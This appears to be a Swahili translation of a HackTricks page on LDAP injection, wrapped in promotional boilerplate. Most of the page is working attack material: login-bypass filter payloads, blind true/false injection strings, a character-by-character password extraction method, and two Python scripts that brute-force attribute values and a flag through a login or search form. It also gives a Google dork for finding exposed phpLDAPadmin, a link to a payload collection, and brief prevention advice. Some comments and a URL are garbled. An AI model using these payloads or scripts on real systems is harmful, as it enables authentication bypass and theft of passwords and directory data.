14 KiB
Uvamizi wa LDAP
Uvamizi wa LDAP
Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud repos za github.
Mshauri wa tuzo ya mdudu: Jisajili kwa Intigriti, jukwaa la malipo ya tuzo za mdudu la premium lililoanzishwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata tuzo za hadi $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Uvamizi wa LDAP
LDAP
Ikiwa unataka kujua ni nini LDAP, tembelea ukurasa ufuatao:
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %} pentesting-ldap.md {% endcontent-ref %}
Uvamizi wa LDAP ni shambulio linalolenga programu za wavuti ambazo hujenga taarifa za LDAP kutoka kwa kuingia kwa mtumiaji. Hutokea wakati programu haijafanya usafi sahihi wa kuingia, kuruhusu wadukuzi kubadilisha taarifa za LDAP kupitia wakala wa ndani, na hatimaye kusababisha ufikiaji usiohalali au udanganyifu wa data.
{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}
Kichujio = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item= simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr ”=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE
Kwa mfano:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))
Unaweza kupata ufikiaji wa hifadhidata, na hii inaweza kuwa na habari ya aina nyingi tofauti.
OpenLDAP: Ikiwa filamu 2 zinafika, inatekeleza tu ya kwanza.
ADAM au Microsoft LDS: Kwa filamu 2, hutoa kosa.
SunOne Directory Server 5.0: Inatekeleza filamu zote mbili.
Ni muhimu sana kutuma kichujio na muundo sahihi au kosa litatolewa. Ni bora kutuma kichujio kimoja tu.
Kichujio lazima kianze na: & au |
Mfano: (&(directory=val1)(folder=public))
(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void
Kisha: (&(objectClass=*)(ObjectClass=*)) itakuwa kichujio cha kwanza (kile kinachotekelezwa).
Kudukua Kuingia
LDAP inasaidia muundo kadhaa wa kuhifadhi nenosiri: wazi, md5, smd5, sh1, sha, crypt. Kwa hivyo, inaweza kuwa kwamba bila kujali unachoweka ndani ya nenosiri, itakuwa imehifadhiwa kwa njia ya hash.
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
Orodha
Uvujaji wa LDAP Kwa Kipofu
Unaweza kulazimisha majibu ya Uongo au ya Kweli ili kuthibitisha kama kuna data yoyote inarudi na kuthibitisha uwezekano wa Uvujaji wa LDAP Kwa Kipofu:
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
Pata data
Unaweza kuzunguka juu ya herufi za ASCII, tarakimu na alama:
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
Scripts
Gundua uga halali za LDAP
Vifaa vya LDAP kwa kawaida vina sifa kadhaa ambazo zinaweza kutumika kuhifadhi habari. Unaweza kujaribu kuzishambulia zote ili kuchukua habari hizo. Unaweza kupata orodha ya sifa za LDAP za msingi hapa.
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys
proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
Uvamizi Maalum wa LDAP wa Kipofu (bila "*")
Description
LDAP Injection is a type of attack that targets applications that use LDAP (Lightweight Directory Access Protocol) for user authentication and data storage. It occurs when an attacker is able to manipulate the input parameters of an LDAP query, allowing them to modify the query's logic and potentially retrieve sensitive information or perform unauthorized actions.
In a special blind LDAP injection attack without the use of the wildcard character "*", the attacker exploits the application's vulnerability to inject LDAP statements that result in a true or false response. By carefully crafting the injected statements, the attacker can infer information about the underlying LDAP database and extract sensitive data.
Exploitation
To exploit this vulnerability, the attacker needs to identify an input field that is vulnerable to LDAP injection. This can typically be found in login forms, search functionalities, or any other feature that interacts with an LDAP server.
Once the vulnerable input field is identified, the attacker can start injecting LDAP statements to manipulate the query's logic. The goal is to construct a statement that will result in a true or false response, revealing information about the LDAP database.
For example, the attacker can inject the following LDAP statement:
(&(username=admin)(password=test))
If the application responds with a successful login message, it means that the injected statement evaluated to true. On the other hand, if the application responds with an error message or behaves differently, it means that the injected statement evaluated to false.
By iteratively injecting different statements and observing the application's response, the attacker can gather information about the LDAP database, such as valid usernames, password hashes, or other sensitive data.
Prevention
To prevent blind LDAP injection attacks, it is important to implement proper input validation and sanitization techniques. Here are some recommended measures:
-
Input validation: Validate and sanitize all user-supplied input before using it in an LDAP query. This includes input from forms, search fields, or any other user-controlled input.
-
Parameterized queries: Use parameterized queries or prepared statements to construct LDAP queries. This helps to separate the query logic from the user input, preventing injection attacks.
-
Least privilege principle: Ensure that the LDAP service account used by the application has the minimum required privileges. This reduces the potential impact of an LDAP injection attack.
-
Error handling: Implement proper error handling mechanisms to avoid leaking sensitive information in error messages. Error messages should be generic and not reveal any specific details about the LDAP database.
By following these best practices, developers can significantly reduce the risk of blind LDAP injection attacks and protect the integrity and confidentiality of their LDAP-based applications.
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
Google Dorks
Google Dorks
Google Dorks ni mbinu za utafutaji za kipekee ambazo zinaweza kutumiwa kutafuta habari zilizofichwa au zilizovuja kwenye wavuti. Wanaweza kutumiwa kwa ufanisi katika uchunguzi wa usalama na upimaji wa wavuti ili kupata habari muhimu kwa shambulio la uwezekano au udhaifu wa mfumo.
Kwa kutumia Google Dorks, unaweza kufanya utafutaji wa kina kwenye wavuti kwa kutumia maneno maalum au mchanganyiko wa maneno. Hii inaweza kukusaidia kupata habari kama vile hati za siri, faili zilizovuja, au hata vitambulisho vya watumiaji na nywila zilizofichwa.
Kwa mfano, unaweza kutumia Google Dorks kuangalia ikiwa kuna tovuti zinazotumia LDAP (Lightweight Directory Access Protocol) na ikiwa zina udhaifu wa LDAP Injection. Hii inaweza kukusaidia kugundua njia za kuingilia kwenye mfumo na kupata habari ya siri.
Ni muhimu kutambua kuwa matumizi ya Google Dorks yanapaswa kufanywa kwa uangalifu na kwa kuzingatia sheria na kanuni za kisheria. Matumizi mabaya ya mbinu hii yanaweza kusababisha madhara makubwa na kukiuka faragha na usalama wa wengine.
intitle:"phpLDAPadmin" inurl:cmd.php
Payloads Zaidi
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
Mwongozo wa bug bounty: Jisajili kwa Intigriti, jukwaa la bug bounty la malipo ya juu lililoanzishwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata malipo hadi $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.